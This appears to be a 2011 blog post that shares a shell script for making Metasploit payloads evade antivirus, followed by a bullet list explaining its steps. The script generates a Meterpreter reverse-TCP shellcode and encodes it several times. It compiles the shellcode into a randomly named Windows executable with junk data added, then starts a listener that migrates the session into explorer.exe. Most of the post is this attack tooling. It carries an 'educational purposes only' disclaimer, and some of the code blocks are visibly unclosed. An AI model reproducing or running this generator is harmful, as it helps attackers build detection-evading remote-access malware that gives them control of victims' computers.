Thursday, November 17, 2011

Fully Undetected Payload Generator from MetaSploit with Linux

I have been researching alot in Payloads and Shellcode i found one very good article about how to Undetect the Payload from the Antivirus.

By default all the generated payload is detected by the Antivirus. They are very enthu in detecting these stuff.Although they are doing their work. But we have lot of options to make it undetect it.

This Script i am posting is not made by me and it is intended to the Intermediate Users of Backtrack and metasploit.

By posting this article i am assuming that you got Metasploit and Backtrack Ready working.

Please note that this is purely educational purposes only i never encourage people involving infecting others or stealing information.
I am just sharing the information which i got from internet.

There is not much to be said about this issue, as there are so many ways to accomplish this. I wanted to try and give it a shot and see how far I will get in creating something what others call FUD (Fully Undetectable). As you can see from below results the file still gets detected by Microsoft and Kaspersky AV but I’ve intentionally left out the important part from the shell script to make it fully undetectable. I was using some simple shellscript-fu and some really basic knowledge of C language. The resulting executable will be different every time you run this script.

What we need is a decent Linux distro and a mingw32 and Metasploit of course. so hopefully the shellscript below will work. As always please study it first to see what it does – don’t be a script kiddie. Please remember to save this into the Metasploit root folder and make it executable.
echo "************************************************************"
echo "    Automatic  shellcode generator - FOR METASPLOIT         "
echo "                  By Astr0baby 2011                         "
echo "  With some Randomic gravy and sauce to bypass Antivirus    "  
echo "    For Automatic Teensy programming and deployment         "
echo "************************************************************"
#Lets check for MinGW32
if  builtin type -p i686-w64-mingw32-gcc > /dev/null ; then 

echo "Here is a network device list available on yor machine"
else echo "Please install the mingw-w64, binutils-mingw-w64, gcc-mingw-w64, mingw-w64-dev, mingw-w64-tools"
echo "exiting.....";  exit
cat /proc/net/dev | tr -s  ' ' | cut -d ' ' -f1,2 | sed -e '1,2d'
echo -e "What network interface are we gonna use ?  \c"
read interface
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo -e "Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : \c"
read seed
echo -e "And lastly how many times do we want to encode our payloads 1-20? : \c"
read enumber
# Get OS name
IO="" # store IP
case $OS in
   Linux) IP=`ifconfig $interface  | grep 'inet addr:'| grep -v '' | cut -d: -f2 | awk '{ print $1}'`;;
   *) IP="Unknown";;
#echo "$IP"
./msfpayload windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port EXITFUNC=thread R | ./msfencode -e x86/shikata_ga_nai -c $enumber -t raw | ./msfencode -e x86/jmp_call_additive -c $enumber -t raw | ./msfencode -e x86/call4_dword_xor -c $enumber -t raw |  ./msfencode -e x86/shikata_ga_nai -c $enumber  > test.c  
mv test.c ShellCode
cd ShellCode
#Replacing plus signs at the end of line
sed -e 's/+/ /g' test.c > clean.c
sed -e 's/buf = /unsigned char micro[]=/g' clean.c > ready.c
echo "#include " >> temp
echo 'unsigned char ufs[]=' >> temp
for (( i=1; i<=10000;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp2
sed -i 's/$/"/' temp2
sed -i 's/^/"/' temp2  
echo  ';' >> temp2  
cat temp2 >> temp
cat ready.c >> temp
mv temp ready2.c
echo ";" >> ready2.c
echo "int main(void) { ((void (*)())micro)();}" >> ready2.c  
mv ready2.c final.c
echo 'unsigned char tap[]=' > temp3
for (( i=1; i<=999999;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp4
sed -i 's/$/"/' temp4
sed -i 's/^/"/' temp4
echo  ';' >> temp4
cat temp4 >> temp3
cat temp3 >> final.c  
rm -f clean.c
rm -f test.c
rm -f ready.c
rm -f rand.c
rm -f temp2
rm -f temp3
rm -f temp4 

i686-w64-mingw32-gcc -Wall ./final.c -o ./final.exe > /dev/null 2>&1
mv final.exe $RANDOM.exe
filex=`ls -ct1 | head -1`
sumx=`sha1sum $filex`
echo $filex "...generated in ShellCode subfolder"
echo $filex "sha1checksum is .." $sumx  
strip --strip-debug $filex
cd ..
echo "      starting the meterpreter listener..."
sleep 2
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port AutoRunScript=' migrate2  explorer.exe'  E

What happens here is this :
  • We choose a network interface according to the /proc/net/dev $interface

  • Next we need to select a port number for our meterpreter to listen on $port

  • Random seed to add some junk to the resulting C code source file $seed

  • Finally with how many cycles we encode our shellcode $enumber

  • Next we create a raw shellcode with msfencode and our variables

  • Do some sed, and format the raw shellcode into C stuff

  • Add some bogus functions and random data array

  • Compile the C source with mingw32 to get Win32 PE executable

  • Rename the EXE to some random filename ex. 32423.exe

  • Strip the binary from Debug info

Here is the screenshot from Antivirus scanner engines Virus Total


0 comments for "Fully Undetected Payload Generator from MetaSploit with Linux"

Post a Comment